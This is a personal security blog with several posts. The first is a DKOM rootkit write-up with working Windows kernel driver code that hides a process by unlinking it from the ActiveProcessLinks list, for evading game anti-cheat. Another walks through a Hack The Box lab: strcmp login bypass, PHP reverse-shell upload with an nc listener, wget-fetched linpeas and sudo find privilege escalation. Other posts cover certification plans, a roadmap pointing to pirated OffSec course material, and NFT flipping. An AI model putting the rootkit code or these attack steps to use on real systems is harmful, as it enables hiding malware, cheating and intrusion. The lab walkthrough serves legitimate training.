Author: sh3n

Conquering Userland (1/3): DKOM Rootkit

sh3nLeave a comment

I am now close at finishing the HTB Junior Pentester role course but decided to take a quick brake and focus on one of my favorite fields: reversing games and evading anti-cheat.

The goal

The end goal is simple, to bypass the Cheat Engine for usermode anti-cheats and allow us to debug a game using type-1 hypervisor.

This writeup will be divided into 3 parts.

  • First will be the concept of Direct Kernel Object Manipulation to make a process unlink from eprocess struct.
  • Second, the concept of hypervisor for debugging.
  • And lastly, is the concept of Patchguard, Driver Signature Enforcement and how to disable those.

So without further ado, let’s get our hands dirty!

Difference Between Kernel mode and User mode

http://mark.rxmsolutions.com/wp-content/uploads/2023/09/Difference-Between-User-Mode-and-Kernel-Mode-fig-1.png
Kernel-mode vs User modeIn kernel mode, the program has direct and unrestricted access to system resources.In user mode, the application program executes and starts.
InterruptionsIn Kernel mode, the whole operating system might go down if an interrupt occursIn user mode, a single process fails if an interrupt occurs.  
ModesKernel mode is also known as the master mode, privileged mode, or system mode.User mode is also known as the unprivileged mode, restricted mode, or slave mode.
Virtual address spaceIn kernel mode, all processes share a single virtual address space.In user mode, all processes get separate virtual address space.
Level of privilegeIn kernel mode, the applications have more privileges as compared to user mode.While in user mode the applications have fewer privileges.
RestrictionsAs kernel mode can access both the user programs as well as the kernel programs there are no restrictions.While user mode needs to access kernel programs as it cannot directly access them.
Mode bit valueThe mode bit of kernel-mode is 0.While; the mode bit of user-mode is 3.
Memory ReferencesIt is capable of referencing both memory areas.It can only make references to memory allocated for user mode. 
System CrashA system crash in kernel mode is severe and makes things more complicated.
 		In user mode, a system crash can be recovered by simply resuming the session.
AccessOnly essential functionality is permitted to operate in this mode.User programs can access and execute in this mode for a given system.
FunctionalityThe kernel mode can refer to any memory block in the system and can also direct the CPU for the execution of an instruction, making it a very potent and significant mode.The user mode is a standard and typical viewing mode, which implies that information cannot be executed on its own or reference any memory block; it needs an Application Protocol Interface (API) to achieve these things.
https://www.geeksforgeeks.org/difference-between-user-mode-and-kernel-mode/

Basically, if the anti-cheat resides only in usermode, then the anti-cheat doesn’t have the total control of the system. If you manage to get into the kernelmode, then you can easily manipulate all objects and events in the usermode. However, it is not advised to do the whole cheat in the kernel alone. One single mistake can cause Blue Screen Of Death, but we do need the kernel to allow us for easy read and write on processes.

EPROCESS

The EPROCESS structure is an opaque structure that serves as the process object for a process.

Some routines, such as PsGetProcessCreateTimeQuadPart, use EPROCESS to identify the process to operate on. Drivers can use the PsGetCurrentProcess routine to obtain a pointer to the process object for the current process and can use the ObReferenceObjectByHandle routine to obtain a pointer to the process object that is associated with the specified handle. The PsInitialSystemProcess global variable points to the process object for the system process.

Note that a process object is an Object Manager object. Drivers should use Object Manager routines such as ObReferenceObject and ObDereferenceObject to maintain the object’s reference count.

https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/eprocess

Interestingly, the EPROCESS contains an important handle that can enumerate the running process.
This is where the magic comes in.

typedef struct _EPROCESS
{
     KPROCESS Pcb;
     EX_PUSH_LOCK ProcessLock;
     LARGE_INTEGER CreateTime;
     LARGE_INTEGER ExitTime;
     EX_RUNDOWN_REF RundownProtect;
     PVOID UniqueProcessId;
     LIST_ENTRY ActiveProcessLinks;
     ULONG QuotaUsage[3];
     ULONG QuotaPeak[3];
     ULONG CommitCharge;
     ULONG PeakVirtualSize;
     ULONG VirtualSize;
     LIST_ENTRY SessionProcessLinks;
     PVOID DebugPort;
     union
     {
          PVOID ExceptionPortData;
          ULONG ExceptionPortValue;
          ULONG ExceptionPortState: 3;
     };
     PHANDLE_TABLE ObjectTable;
     EX_FAST_REF Token;
     ULONG WorkingSetPage;
     EX_PUSH_LOCK AddressCreationLock;
...
http://mark.rxmsolutions.com/wp-content/uploads/2023/09/0cb07-capture.jpg

Each list element in LIST_ENTRY is linked towards the next application pointer (flink) and also backwards (blink) which then from a circular list pattern. Each application opened is added to the list, and removed also when closed.

Now here comes the juicy part!

Unlinking the process

Basically, removing the pointer of an application in the ActiveProcessLinks, means the application will now be invisible from other process enumeration. But don’t get me wrong. This is still detectable especially when an anti-cheat have kernel driver because they can easily scan for unlinked patterns and/or perform memory pattern scanning.

A lot of rootkits use this method to hide their process.

adios

Visualization

Before / Original State
After Modification

Checkout this link for image credits and for also a different perspective of the attack.

Kernel Driver

NTSTATUS processHiderDeviceControl(PDEVICE_OBJECT, PIRP irp) {
	auto stack = IoGetCurrentIrpStackLocation(irp);
	auto status = STATUS_SUCCESS;

	switch (stack->Parameters.DeviceIoControl.IoControlCode) {
	case IOCTL_PROCESS_HIDE_BY_PID:
	{
		const auto size = stack->Parameters.DeviceIoControl.InputBufferLength;
		if (size != sizeof(HANDLE)) {
			status = STATUS_INVALID_BUFFER_SIZE;
		}
		const auto pid = *reinterpret_cast<HANDLE*>(stack->Parameters.DeviceIoControl.Type3InputBuffer);
		PEPROCESS eprocessAddress = nullptr;
		status = PsLookupProcessByProcessId(pid, &eprocessAddress);
		if (!NT_SUCCESS(status)) {
			KdPrint(("Failed to look for process by id (0x%08X)\n", status));
			break;
		}

Here, we can see that we are finding the eprocessAddress by using PsLookupProcessByProcessId.
We will also get the offset by finding the pid in the struct. We know that ActiveProcessLinks is just below the UniqueProcessId. This might not be the best possible way because it may break on the future patches when a new element is inserted below UniqueProcessId.

Here is a table of offsets used by different windows versions if you want to use manual offsets rather than the method above.

Win7Sp00x188
Win7Sp10x188
Win8p10x2e8
Win10v16070x2f0
Win10v17030x2e8
Win10v17090x2e8
Win10v18030x2e8
Win10v18090x2e8
Win10v19030x2f0
Win10v19090x2f0
Win10v20040x448
Win10v20H10x448
Win10v20090x448
Win10v20H20x448
Win10v21H10x448
Win10v21H20x448
ActiveProcessLinks offsets
		auto addr = reinterpret_cast<HANDLE*>(eprocessAddress);
		LIST_ENTRY* activeProcessList = 0;
		for (SIZE_T offset = 0; offset < consts::MAX_EPROCESS_SIZE / sizeof(SIZE_T*); offset++) {
			if (addr[offset] == pid) {
				activeProcessList = reinterpret_cast<LIST_ENTRY*>(addr + offset + 1);
				break;
			}
		}

		if (!activeProcessList) {
			ObDereferenceObject(eprocessAddress);
			status = STATUS_UNSUCCESSFUL;
			break;
		}

		KdPrint(("Found address for ActiveProcessList! (0x%08X)\n", activeProcessList));

		if (activeProcessList->Flink == activeProcessList && activeProcessList->Blink == activeProcessList) {
			ObDereferenceObject(eprocessAddress);
			status = STATUS_ALREADY_COMPLETE;
			break;
		}

		LIST_ENTRY* prevProcess = activeProcessList->Blink;
		LIST_ENTRY* nextProcess = activeProcessList->Flink;

		prevProcess->Flink = nextProcess;
		nextProcess->Blink = prevProcess;

We also want the process-to-be-hidden to link on its own because the pointer might not exists anymore if the linked process dies.

		activeProcessList->Blink = activeProcessList;
		activeProcessList->Flink = activeProcessList;

		ObDereferenceObject(eprocessAddress);
	}
		break;
	default:
		status = STATUS_INVALID_DEVICE_REQUEST;
		break;
	}

	irp->IoStatus.Status = status;
	irp->IoStatus.Information = 0;
	IoCompleteRequest(irp, IO_NO_INCREMENT);
	return status;
}

POC

Before
After

Warnings

There are 2 problems that you need to solve first before being able to do this method.

First: You need to disable Driver Signature Enforcement

You need to load your driver to be able to execute kernel functions. You either buy a certificate to sign your own driver so you do not need to disable DSE or you can just disable DSE from windows itself. The only problem of disabling DSE is that some games requires you to have enabled DSE before playing.

Second: Bypass Patchguard

Manually messing with DKOM will result you to BSOD. They got a tons of checks. But luckily we have some ways to bypass patchguard.

These 2 will be tackled on the 3rd part of the writeup. Stay tuned!

HTB: Bug Bounty Hunter

sh3nLeave a comment

I just got finished the Bug Bounty Hunter Job Role path from HTB. At this point, I am eligible to take HTB Certified Bug Bounty Hunter (HTB CBBH) certification. But I feel that I am still not very much confident to take it. The exam cost $210 as of this writing and allow 2 attempts. The exam runs for 7 days without proctor and it is an open note and only the sky is the limit. Check this out for more info: https://academy.hackthebox.com/preview/certifications/htb-certified-bug-bounty-hunter/

Interestingly, HTB did release a new certification called HTB Certified Penetration Testing Specialist (HTB CPTS) and this is for completing the Junior Penetration Tester Job Role path.

I am thinking to complete the said path first then take HTB CPTS before going directly with OSCP as people rate that HTB is much more harder than OSCP.

Ironically, OSCP is more considered on industry and have a much higher employment value. Who knows? HTB is actually getting ramped up for competing with OSCP and other similar certifications.

My CCNA will be expired next year, so I have to take a higher certificate to automatically renew it. My target will be CCNP Security.

With that being said, here are my certifications that I’ve been dreaming a lot:

Anyway! I feel like I am at 25% of my road to OSCP. Still a lot of work to do, but I won’t stop!

That’s it for my short update! ❤️

First HTB Machine HACKED w/o walkthrough (HTB: Base)

sh3nLeave a comment

Introduction

This is my very first HTB machine hacked without walkthrough. I finished it within 2 Hours and 17 minutes. Kinda’ feel slow, considering it’s labeled as “EASY”. LOL. ???. There are other machines that I tried not to read walkthrough but I failed. I found myself lacking basic methodologies, imagine brute-forcing a login page for 1 hour long but the password is only simple AF as admin:password. So this time, I tried to re-adjust my enumeration and active attack methodologies.

Enumeration

sudo $(which autorecon) {target_IP}

It then produce 2 open ports which are 22 (SSH), and 80 (HTTP)

autorecon scan results

I use autorecon because it also auto enumerate dirs and try to execute scripts against the ports. Also, it can be left on background while you do other tasks.

http screenshot

There are 2 interesting components here. The contact form and the login. I tried to messed up with contact form first but no interesting happened. Next I tried the login. And I discovered that login directory can be listed.

/login directory listing

We found login.php.swp which can be used to recover parts from vim. Load the file to vim then use:

:recover login.php.swp

From there, we can find interesting.

login.php.swp recovered

Using strcmp to check validity of username and password is not really a good idea. It can be bypassed if we pass username[] instead of username, same with password. Check here for more details: https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016. We then proxied to burp suite and reconstruct the payload.

burpsuite

Easy! Login bypassed! Next, we are taken to the upload page where we can upload our php reverse shell. We uploaded it successfully (based on the message after uploading) but we don’t know the path to it. Luckily, autorecon caught the possible uploads directory.

autorecon scan results

We can find it under /_uploaded/<reverse_shell_file>. But first let’s set our shell listener first. Then visit the shell location.

nc -nvlp 4444
Reverse shell

We then proceed to check interesting directories and files. We then tried to check the contents of config.php. We found username and password. I tried to ssh using admin username, but it seems not working. We then proceed to check more interesting files.

/etc/passwd

We found john on the list of users. We tried to login on ssh using john as username and the previously found password. It worked!

Privilege Escalation

Manually enumerating all possible vectors for privilege escalation is hassle, so we send linpeas to the victim. We first setup our http port with linpeas in its directory using:

python3 -m http.server 80

Then we use this code to fetch the linpeas:

wget http://{my_IP}/linpeas.sh -O linpeas.sh

Also, don’t forget to chmod to allow it to run

chmod +x linpeas.sh
linPeas

We found some interesting results. I proceed to testing the results but it fails us to give the privilege escalation. We then check our sudo privilege.

sudo -l

We found john can leverage/usr/bin/find as sudo so we tried executing it with -exec parameters.

/usr/bin/find leads to root shell

Conclusion

Directory listing and misused strcmp can be dangerous. Proper configuration is the key to safety even with the smallest details.

OSCP: Exploring the Upside Down

sh3nLeave a comment

It’s been 14th day since I started to study for Offensive Security Certified Professional (OSCP) certification. People say that OSCP is not for beginners, yeah, I say the same too. The path to OSCP is like an upside down and you are a lone explorer in the world full of unexplored areas.

Stranger Things 2: The Season's Visual Effects, Explained
Stranger Things: Upside Down

When I say unexplored, it is like a parallel world that exists on our world. What I mean to this, is you just don’t randomly discuss Privilege Escalation or Reverse Shell exploitation with your wife or with your non-IT friends. They’ll just tell your screws must be loosen.

Luckily, over my past few experiences, I already got some small head start for my journey. I already got CCNA for networking, and some low level programming (ASM) (thanks to https://www.unknowncheats.me/forum/index.php). I still have a lot of work to do as this is only just a small head start and not the full context.

I can describe my head start as Information scattered all over and just waiting them to be connected to become Knowledge.

Show Information; Not Data | Data, Try your best, Infographic
Data to something else

Now, if you are truly zero knowledge with OSCP topics. I don’t recommend taking it unless you are really determined and fully committed to it. It is really really really frustrating especially when seeing ridiculously mind blowing numbers and alphabets popping-off your screen.

OllyDbg 64
OllyDBG

The above screenshot is a windows debugger used to debug applications. It is usually used as stack analyzer for buffer overflow exploitation. But that’s not all, it can do a really lot of things. Quite overwhelming right? But hey, just like I said, with proper planning, we can achieve OSCP too.

My Roadmap

My roadmap is simple. I first gathered some materials to watch/review/memorize and try. Luckily, I found a website that offers exact content from OffSec: https://pwk.hide01.ir, yup, FREE! without paying. Now, as advised by a lot of people who took OSCP too, you might wanna try subscribing to HackTheBox VIP (15$) & Offsec Proving Grounds (20$) subscription first after/during studying for hands-on experience.

Next thing, when I feel I am confident with the tools and get to pawned a lot of machines, I will now start to subscribe to PEN-200. I just did get a local copy of exact course content first so I can study what I will face during the course proper. Also, I don’t want to start my lab subscription when I don’t even know what’s inside the course. In short, I just did some fail safe option than losing a lot of money for subscription if I didn’t finish the course on-time.

In the end, you are still forced to subscribe to PEN-200 subscription because they don’t offer an Exam Only option.

I know my journey is still long. I will constantly make writeups here in my blog during my journey towards OSCP.

Thanks for reading! More updates soon! ?

Beginners guide: GFT x NFT

sh3nLeave a comment

So what are NFTs?

In the simplest terms, NFTs transform digital works of art and other collectibles into one-of-a-kind, verifiable assets that are easy to trade on the blockchain.
Well, there are lot of many articles online to read regarding the NFTs, kindly check out here: https://www.theverge.com/22310188/nft-explainer-what-is-blockchain-crypto-art-faq

This article will be then subdivided into 3 main parts: theoretical, technical and proof-of-concept.

Theoretical

Your main goal is to double, triple, quadruple (or even higher) your money in the shortest time possible with little or no risk at all.

Now lets breakdown some thoughts in the sentence above.

  1. The keyword is double, triple, or quadruple, meaning, you still need some capital to start with. The capital will be used in: gas fees, minting fee, and other matters. So yeah, this is not free money after all.
  2. Shortest time possible, there are lot of options in the crypto space but what we are interested is the shortest and fastest way to gain money. In the crypto space, you can have many perspectives such as: Developer, Artist, Long-term Investor, DAO, Flipper, and etc. We will be focusing on the perspective of Flipper as it doesn’t much require technical skills to be one.
  3. Little or no risk at all, because what we want is to position ourselves with little or zero risk at all so you can be comfortable with your investment positions.

Flipping

The basic concept of flipping is to buy low, sell high without holding your NFT for long. The basic 4 steps for flipping is as follows:

  1. Find a project with great hype potential
  2. Get Whitelisted in that project
  3. Mint your NFTs
  4. Sell them in Secondary market with great markup

Sounds easy, right? Well, not at all. Finding a project with less people with great potential is life finding a needle on the haystack. There are lot of NFT projects out there and you need to find where the traffic might be. The basic rule of a project is that, you cannot make quick money if hype is low.

Whitelist

Whitelisting is the act of securing your spot to have a sure allocation for you. The early you get on the project, the more chances of having wl because you have advantage over other people that are just starting to join the project. The common tasks on projects to get wl are: Inviting users on the discord server, leveling up on the discord server by having a meaningful conversation, participating on games and events, being socially active in sharing the project, submitting fan arts, and etc. If you find yourself in the middle of a project that is almost halfway on its preparation date before launch, it might take some work to be part of whitelist. The spots are limited, once they are full, you cannot be wl anymore, you can still join the public sale tho, but you don’t want to join public sale because of the gas war.

Mint your NFTs

The purpose of having wl, is to secure your mint. Minting is an act of buying an NFT directly from the creator or owner of the project. Usually the NFTs have a total supply, once the total supply is consumed, then you cannot mint anymore. For example, the project BAYC is a collection of 10k pieces of art. No new BAYC can be minted anymore. Imagine having an item that is limited edition, it is so cool, right?

Reselling

You can always resell your NFTs on secondary markets. As soon as you finished your mint, you can immediately resell it to secondary markets. You can list it on a certain price and just wait for someone to buy it. The basic rule is to always check the flooring price and decide a realistic price. If the price flooring is going up, you might want to list it a little bit higher. When price flooring goes down, you might want to list it with the same price of price flooring.

Risks

  • Rug pulls – projects that are abandoned by the owners/creators/developers that initially started the project after making money. Usually in flipping, you can still make money before the team decided to make a rug pull, because flipping is a very short span of time, you can exit immediately before the project goes down. Mint, then immediately list your item with realistic price so that it can be bought fast.
  • Failure to deliver promises – some project are failing to deliver their promises on-time which might make the investors pull out their investments. But usually, this is for long term holding which a flipper do not need to think of.
  • Low Hype – some projects have a low fanbase. If a project has a low hype, then the project might not have traffic at all. If you have projects that are already wl, make sure to check the hype first before minting, don’t be easily FOMOed, check the bigger picture first.

The more hype to the project, the more Greatest Fool Theory in action ?

Technical

You don’t need to know technicalities of the blockchain, but it will greatly help you to make more wise decisions, if you are not interested, you can just skip this part.

Usually the NFTs are erc721 standard. And most projects are in eth blockchain and can be analyzed by etherscan.

The most important functions for erc721 are: 

function setApprovalForAll(address _operator, bool _approved) external

and

function totalSupply() external view returns (uint256)

Without that functions, you cannot transfer an erc721 token from one holder to another, so its best to check and review the code first. Also the totalSupply tells the number of tokens that are currently minted, you can gauged how much more remaining tokens that are not yet minted so you can have wise decisions based from that.

Maybe let’s deep dive on the technicalities on my next blogs.

Proof-of-Concept

[REDACTED]

Bonus: Tax

[REDACTED]

Conclusion

Right now, flipping is the best option in crypto to gain fast without much risks. But as we always say, you should still do your own research before anything else. I am not a financial expert nor advisor. All content of this article are just purely on my experience.

I hope you enjoy reading this article! Goodluck and have a nice day ?